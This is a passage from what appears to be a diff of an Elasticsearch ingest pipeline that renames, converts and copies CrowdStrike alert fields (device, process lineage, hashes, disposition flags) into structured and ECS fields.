json.device.cid + tag: rename_device_cid + target_field: crowdstrike.alert.device.cid + ignore_missing: true + - rename: + field: json.device.config_id_base + tag: rename_device_config_id_base + target_field: crowdstrike.alert.device.config_id_base + ignore_missing: true + - rename: + field: json.device.config_id_build + tag: rename_device_config_id_build + target_field: crowdstrike.alert.device.config_id_build + ignore_missing: true + - convert: + field: json.device.config_id_platform + tag: convert_device_config_id_platform_to_long + target_field: crowdstrike.alert.device.config_id_platform + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.device.external_ip + tag: convert_device_external_ip_to_ip + target_field: crowdstrike.alert.device.external_ip + type: ip + ignore_missing: true + if: ctx.json?.device?.external_ip != null && ctx.json.device.external_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_crowdstrike_alert_device_external_ip_into_related_ip + value: '{{{crowdstrike.alert.device.external_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.device?.external_ip != null + - append: + field: host.ip + tag: append_crowdstrike_alert_device_external_ip_into_host_ip + value: '{{{crowdstrike.alert.device.external_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.device?.external_ip != null + - date: + field: json.device.first_seen + tag: date_device_first_seen + target_field: crowdstrike.alert.device.first_seen + formats: + - ISO8601 + if: ctx.json?.device?.first_seen != null && ctx.json.device.first_seen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device.groups + tag: rename_device_groups + target_field: crowdstrike.alert.device.groups + ignore_missing: true + - rename: + field: json.device.hostinfo.active_directory_dn_display + tag: rename_device_hostinfo_active_directory_dn_display + target_field: crowdstrike.alert.device.hostinfo.active_directory_dn_display + ignore_missing: true + - rename: + field: json.device.hostinfo.domain + tag: rename_device_hostinfo_domain + target_field: crowdstrike.alert.device.hostinfo.domain + ignore_missing: true + - set: + field: host.domain + tag: set_host_domain_from_alert_device_hostinfo_domain + copy_from: crowdstrike.alert.device.hostinfo.domain + ignore_empty_value: true + - append: + field: related.hosts + value: '{{{host.domain}}}' + allow_duplicates: false + if: ctx.host?.domain != null + - rename: + field: json.device.hostname + tag: rename_device_hostname + target_field: crowdstrike.alert.device.hostname + ignore_missing: true + - set: + field: host.hostname + tag: set_host_hostname_from_alert_device_hostname + copy_from: crowdstrike.alert.device.hostname + ignore_empty_value: true + - append: + field: related.hash + value: '{{{host.hostname}}}' + allow_duplicates: false + if: ctx.host?.hostname != null + - rename: + field: json.device.device_id + tag: rename_device_device_id + target_field: crowdstrike.alert.device.id + ignore_missing: true + - set: + field: device.id + tag: set_device_id_from_alert_device_id + copy_from: crowdstrike.alert.device.id + ignore_empty_value: true + - date: + field: json.device.last_seen + tag: date_device_last_seen + target_field: crowdstrike.alert.device.last_seen + formats: + - ISO8601 + if: ctx.json?.device?.last_seen != null && ctx.json.device.last_seen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.device.local_ip + tag: convert_device_local_ip_to_ip + target_field: crowdstrike.alert.device.local_ip + type: ip + ignore_missing: true + if: ctx.json?.device?.local_ip != null && ctx.json.device.local_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_crowdstrike_alert_device_local_ip_into_related_ip + value: '{{{crowdstrike.alert.device.local_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.device?.local_ip != null + - gsub: + field: json.device.mac_address + tag: gsub_device_mac_address + pattern: '[:.]' + replacement: '-' + target_field: crowdstrike.alert.device.mac_address + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - uppercase: + field: crowdstrike.alert.device.mac_address + tag: uppercase_device_mac_address + ignore_missing: true + if: ctx.crowdstrike?.alert?.device?.mac_address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: host.mac + value: '{{{crowdstrike.alert.device.mac_address}}}' + tag: append_device_mac_address_into_host_mac + allow_duplicates: false + if: ctx.crowdstrike?.alert?.device?.mac_address != null + - rename: + field: json.device.machine_domain + tag: rename_device_machine_domain + target_field: crowdstrike.alert.device.machine_domain + ignore_missing: true + - append: + field: related.hosts + value: '{{{crowdstrike.alert.device.machine_domain}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.device?.machine_domain != null + - rename: + field: json.device.major_version + tag: rename_device_major_version + target_field: crowdstrike.alert.device.major_version + ignore_missing: true + - rename: + field: json.device.minor_version + tag: rename_device_minor_version + target_field: crowdstrike.alert.device.minor_version + ignore_missing: true + - date: + field: json.device.modified_timestamp + tag: date_device_modified_timestamp + target_field: crowdstrike.alert.device.modified_timestamp + formats: + - ISO8601 + if: ctx.json?.device?.modified_timestamp != null && ctx.json.device.modified_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device.os_version + tag: rename_device_os_version + target_field: crowdstrike.alert.device.os_version + ignore_missing: true + - set: + field: host.os.full + tag: set_host_os_full_from_alert_device_os_version + copy_from: crowdstrike.alert.device.os_version + ignore_empty_value: true + - rename: + field: json.device.ou + tag: rename_device_ou + target_field: crowdstrike.alert.device.ou + ignore_missing: true + - rename: + field: json.device.platform_id + tag: rename_device_platform_id + target_field: crowdstrike.alert.device.platform_id + ignore_missing: true + - rename: + field: json.device.platform_name + tag: rename_device_platform_name + target_field: crowdstrike.alert.device.platform_name + ignore_missing: true + - set: + field: host.os.platform + tag: set_host_os_platform_from_alert_device_platform_name + copy_from: crowdstrike.alert.device.platform_name + ignore_empty_value: true + - rename: + field: json.device.pod_labels + tag: rename_device_pod_labels + target_field: crowdstrike.alert.device.pod_labels + ignore_missing: true + - rename: + field: json.device.product_type + tag: rename_device_product_type + target_field: crowdstrike.alert.device.product_type + ignore_missing: true + - rename: + field: json.device.product_type_desc + tag: rename_device_product_type_desc + target_field: crowdstrike.alert.device.product_type_desc + ignore_missing: true + - rename: + field: json.device.site_name + tag: rename_device_site_name + target_field: crowdstrike.alert.device.site_name + ignore_missing: true + - rename: + field: json.device.status + tag: rename_device_status + target_field: crowdstrike.alert.device.status + ignore_missing: true + - rename: + field: json.device.system_manufacturer + tag: rename_device_system_manufacturer + target_field: crowdstrike.alert.device.system_manufacturer + ignore_missing: true + - rename: + field: json.device.system_product_name + tag: rename_device_system_product_name + target_field: crowdstrike.alert.device.system_product_name + ignore_missing: true + - rename: + field: json.falcon_host_link + tag: rename_falcon_host_link + target_field: crowdstrike.alert.falcon_host_link + ignore_missing: true + - rename: + field: json.filename + tag: rename_filename + target_field: crowdstrike.alert.filename + ignore_missing: true + - set: + field: file.name + tag: set_file_name_from_alert_filename + copy_from: crowdstrike.alert.filename + ignore_empty_value: true + - rename: + field: json.filepath + tag: rename_filepath + target_field: crowdstrike.alert.filepath + ignore_missing: true + - set: + field: file.path + tag: set_file_path_from_alert_filepath + copy_from: crowdstrike.alert.filepath + ignore_empty_value: true + - rename: + field: json.grandparent_details.cmdline + tag: rename_grandparent_details_cmdline + target_field: crowdstrike.alert.grandparent_details.cmdline + ignore_missing: true + - rename: + field: json.grandparent_details.filename + tag: rename_grandparent_details_filename + target_field: crowdstrike.alert.grandparent_details.filename + ignore_missing: true + - rename: + field: json.grandparent_details.filepath + tag: rename_grandparent_details_filepath + target_field: crowdstrike.alert.grandparent_details.filepath + ignore_missing: true + - rename: + field: json.grandparent_details.local_process_id + tag: rename_grandparent_details_local_process_id + target_field: crowdstrike.alert.grandparent_details.local_process_id + ignore_missing: true + - rename: + field: json.grandparent_details.md5 + tag: rename_grandparent_details_md5 + target_field: crowdstrike.alert.grandparent_details.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.alert.grandparent_details.md5}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.grandparent_details?.md5 != null + - rename: + field: json.grandparent_details.process_graph_id + tag: rename_grandparent_details_process_graph_id + target_field: crowdstrike.alert.grandparent_details.process_graph_id + ignore_missing: true + - rename: + field: json.grandparent_details.process_id + tag: rename_grandparent_details_process_id + target_field: crowdstrike.alert.grandparent_details.process_id + ignore_missing: true + - rename: + field: json.grandparent_details.sha256 + tag: rename_grandparent_details_sha256 + target_field: crowdstrike.alert.grandparent_details.sha256 + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.alert.parent_details.sha256}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.sha256 != null + - date: + field: json.grandparent_details.timestamp + tag: date_grandparent_details_timestamp + target_field: crowdstrike.alert.grandparent_details.timestamp + formats: + - ISO8601 + if: ctx.json?.grandparent_details?.timestamp != null && ctx.json.grandparent_details.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.grandparent_details.user_graph_id + tag: rename_grandparent_details_user_graph_id + target_field: crowdstrike.alert.grandparent_details.user_graph_id + ignore_missing: true + - append: + field: related.user + tag: append_user_graph_id_into_related_user + value: '{{{crowdstrike.alert.grandparent_details.user_graph_id}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.grandparent_details?.user_graph_id != null + - rename: + field: json.grandparent_details.user_id + tag: rename_grandparent_details_user_id + target_field: crowdstrike.alert.grandparent_details.user_id + ignore_missing: true + - append: + field: related.user + tag: append_grandparent_details_user_id_into_related_user + value: '{{{crowdstrike.alert.grandparent_details.user_id}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.grandparent_details?.user_id != null + - rename: + field: json.grandparent_details.user_name + tag: rename_grandparent_details_user_name + target_field: crowdstrike.alert.grandparent_details.user_name + ignore_missing: true + - append: + field: related.user + tag: append_grandparent_details_user_name_into_related_user + value: '{{{crowdstrike.alert.grandparent_details.user_name}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.grandparent_details?.user_name != null + - convert: + field: json.has_script_or_module_ioc + tag: convert_has_script_or_module_ioc_to_boolean + target_field: crowdstrike.alert.has_script_or_module_ioc + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.id + tag: rename_id + target_field: crowdstrike.alert.id + ignore_missing: true + - set: + field: event.id + tag: set_event_id_from_alert_id + copy_from: crowdstrike.alert.id + ignore_empty_value: true + - rename: + field: json.indicator_id + tag: rename_indicator_id + target_field: crowdstrike.alert.indicator_id + ignore_missing: true + - rename: + field: json.ioc_context + tag: rename_ioc_context + target_field: crowdstrike.alert.ioc_context + ignore_missing: true + - foreach: + field: crowdstrike.alert.ioc_context + if: ctx.crowdstrike?.alert?.ioc_context instanceof List + ignore_failure: true + processor: + append: + field: related.hash + value: '{{{_ingest._value.md5}}}' + allow_duplicates: false + - foreach: + field: crowdstrike.alert.ioc_context + if: ctx.crowdstrike?.alert?.ioc_context instanceof List + ignore_failure: true + processor: + append: + field: related.hash + value: '{{{_ingest._value.sha256}}}' + allow_duplicates: false + - rename: + field: json.ioc_values + tag: rename_ioc_values + target_field: crowdstrike.alert.ioc_values + ignore_missing: true + - convert: + field: json.is_synthetic_quarantine_disposition + tag: convert_is_synthetic_quarantine_disposition_to_boolean + target_field: crowdstrike.alert.is_synthetic_quarantine_disposition + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.local_process_id + tag: rename_local_process_id + target_field: crowdstrike.alert.local_process_id + ignore_missing: true + - rename: + field: json.logon_domain + tag: rename_logon_domain + target_field: crowdstrike.alert.logon_domain + ignore_missing: true + - rename: + field: json.md5 + tag: rename_md5 + target_field: crowdstrike.alert.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.alert.md5}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.md5 != null + - rename: + field: json.name + tag: rename_name + target_field: crowdstrike.alert.name + ignore_missing: true + - rename: + field: json.objective + tag: rename_objective + target_field: crowdstrike.alert.objective + ignore_missing: true + - rename: + field: json.parent_details.cmdline + tag: rename_parent_details_cmdline + target_field: crowdstrike.alert.parent_details.cmdline + ignore_missing: true + - set: + field: process.parent.command_line + tag: set_process_parent_command_line_from_alert_parent_details_cmdline + copy_from: crowdstrike.alert.parent_details.cmdline + ignore_empty_value: true + - rename: + field: json.parent_details.filename + tag: rename_parent_details_filename + target_field: crowdstrike.alert.parent_details.filename + ignore_missing: true + - rename: + field: json.parent_details.filepath + tag: rename_parent_details_filepath + target_field: crowdstrike.alert.parent_details.filepath + ignore_missing: true + - rename: + field: json.parent_details.local_process_id + tag: rename_parent_details_local_process_id + target_field: crowdstrike.alert.parent_details.local_process_id + ignore_missing: true + - rename: + field: json.parent_details.md5 + tag: rename_parent_details_md5 + target_field: crowdstrike.alert.parent_details.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.alert.parent_details.md5}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.md5 != null + - set: + field: process.parent.hash.md5 + tag: set_process_parent_hash_md5_from_alert_parent_details_md5 + copy_from: crowdstrike.alert.parent_details.md5 + ignore_empty_value: true + - rename: + field: json.parent_details.process_graph_id + tag: rename_parent_details_process_graph_id + target_field: crowdstrike.alert.parent_details.process_graph_id + ignore_missing: true + - rename: + field: json.parent_details.process_id + tag: rename_parent_details_process_id + target_field: crowdstrike.alert.parent_details.process_id + ignore_missing: true + - rename: + field: json.parent_details.sha256 + tag: rename_parent_details_sha256 + target_field: crowdstrike.alert.parent_details.sha256 + ignore_missing: true + - set: + field: process.parent.hash.sha256 + tag: set_process_parent_hash_sha256_from_alert_parent_details_sha256 + copy_from: crowdstrike.alert.parent_details.sha256 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{crowdstrike.alert.parent_details.sha256}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.sha256 != null + - date: + field: json.parent_details.timestamp + tag: date_parent_details_timestamp + target_field: crowdstrike.alert.parent_details.timestamp + formats: + - ISO8601 + if: ctx.json?.parent_details?.timestamp != null && ctx.json.parent_details.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.parent_details.user_graph_id + tag: rename_parent_details_user_graph_id + target_field: crowdstrike.alert.parent_details.user_graph_id + ignore_missing: true + - append: + field: related.user + tag: append_parent_details_user_graph_id_into_related_user + value: '{{{crowdstrike.alert.parent_details.user_graph_id}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.user_graph_id != null + - rename: + field: json.parent_details.user_id + tag: rename_parent_details_user_id + target_field: crowdstrike.alert.parent_details.user_id + ignore_missing: true + - set: + field: process.user.id + tag: set_process_user_id_from_alert_parent_details_user_id + copy_from: crowdstrike.alert.parent_details.user_id + ignore_empty_value: true + - rename: + field: json.parent_details.user_name + tag: rename_parent_details_user_name + target_field: crowdstrike.alert.parent_details.user_name + ignore_missing: true + - set: + field: process.user.name + tag: set_process_user_name_from_alert_parent_details_user_name + copy_from: crowdstrike.alert.parent_details.user_name + ignore_empty_value: true + - append: + field: related.user + tag: append_parent_details_user_id_into_related_user + value: '{{{crowdstrike.alert.parent_details.user_id}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.user_id != null + - append: + field: related.user + tag: append_parent_details_user_name_into_related_user + value: '{{{crowdstrike.alert.parent_details.user_name}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.user_name != null + - rename: + field: json.parent_process_id + tag: rename_parent_process_id + target_field: crowdstrike.alert.parent_process_id + ignore_missing: true + - convert: + field: crowdstrike.alert.parent_process_id + tag: convert_alert_parent_process_id + target_field: process.parent.pid + type: long + ignore_missing: true + if: ctx.crowdstrike?.alert?.parent_process_id != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition + tag: convert_pattern_disposition_to_long + target_field: crowdstrike.alert.pattern_disposition + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.pattern_disposition_description + tag: rename_pattern_disposition_description + target_field: crowdstrike.alert.pattern_disposition_description + ignore_missing: true + - convert: + field: json.pattern_disposition_details.blocking_unsupported_or_disabled + tag: convert_pattern_disposition_details_blocking_unsupported_or_disabled_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.blocking_unsupported_or_disabled + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.bootup_safeguard_enabled + tag: convert_pattern_disposition_details_bootup_safeguard_enabled_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.bootup_safeguard_enabled + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.critical_process_disabled + tag: convert_pattern_disposition_details_critical_process_disabled_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.critical_process_disabled + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.detect + tag: convert_pattern_disposition_details_detect_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.detect + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.fs_operation_blocked + tag: convert_pattern_disposition_details_fs_operation_blocked_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.fs_operation_blocked + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.handle_operation_downgraded + tag: convert_pattern_disposition_details_handle_operation_downgraded_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.handle_operation_downgraded + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.inddet_mask + tag: convert_pattern_disposition_details_inddet_mask_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.inddet_mask + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.indicator + tag: convert_pattern_disposition_details_indicator_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.indicator + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.kill_action_failed + tag: convert_pattern_disposition_details_kill_action_failed_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.kill_action_failed + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.kill_parent + tag: convert_pattern_disposition_details_kill_parent_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.kill_parent + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.kill_process + tag: convert_pattern_disposition_details_kill_process_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.kill_process + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.kill_subprocess + tag: convert_pattern_disposition_details_kill_subprocess_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.kill_subprocess + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.operation_blocked + tag: convert_pattern_disposition_details_operation_blocked_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.operation_blocked + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.policy_disabled + tag: convert_pattern_disposition_details_policy_disabled_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.policy_disabled + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.process_blocked + tag: convert_pattern_disposition_details_process_blocked_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.process_blocked + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.quarantine_file + tag: convert_pattern_disposition_details_quarantine_file_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.quarantine_file + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.quarantine_machine + tag: convert_pattern_disposition_details_quarantine_machine_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.quarantine_machine + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.registry_operation_blocked + tag: convert_pattern_disposition_details_registry_operation_blocked_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.registry_operation_blocked + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.rooting + tag: convert_pattern_disposition_details_rooting_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.rooting + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.sensor_only + tag: convert_pattern_disposition_details_sensor_only_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.sensor_only + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.suspend_parent + tag: convert_pattern_disposition_details_suspend_parent_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.suspend_parent + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.suspend_process + tag: convert_pattern_disposition_details_suspend_process_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.suspend_process + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_id + tag: convert_pattern_id_to_string + target_field: crowdstrike.alert.pattern_id + type: string + ignore_missing: true + - rename: + field: json.platform + tag: rename_platform + target_field: crowdstrike.alert.platform + ignore_missing: true + - rename: + field: json.poly_id + tag: rename_poly_id + target_field: crowdstrike.alert.poly_id + ignore_missing: true + - date: + field: json.process_end_time + tag: date_process_end_time + target_field: crowdstrike.alert.process_end_time + formats: + - ISO8601 + - UNIX + if: ctx.json?.process_end_time != null && ctx.json.process_end_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: process.end + tag: set_process_end + copy_from: crowdstrike.alert.process_end_time + ignore_empty_value: true + - rename: + field: json.process_id + tag: rename_process_id + target_field: crowdstrike.alert.process_id + ignore_missing: true + - convert: + field: crowdstrike.alert.process_id + tag: convert_alert_process_id_to_long + target_field: process.pid + type: long + ignore_missing: true + if: ctx.crowdstrike?.alert?.process_id != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.process_start_time + tag: date_process_start_time + target_field: crowdstrike.alert.process_start_time + formats: + - ISO8601 + - UNIX + if: ctx.json?.process_start_time != null && ctx.json.process_start_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: process.start + tag: set_process_start + 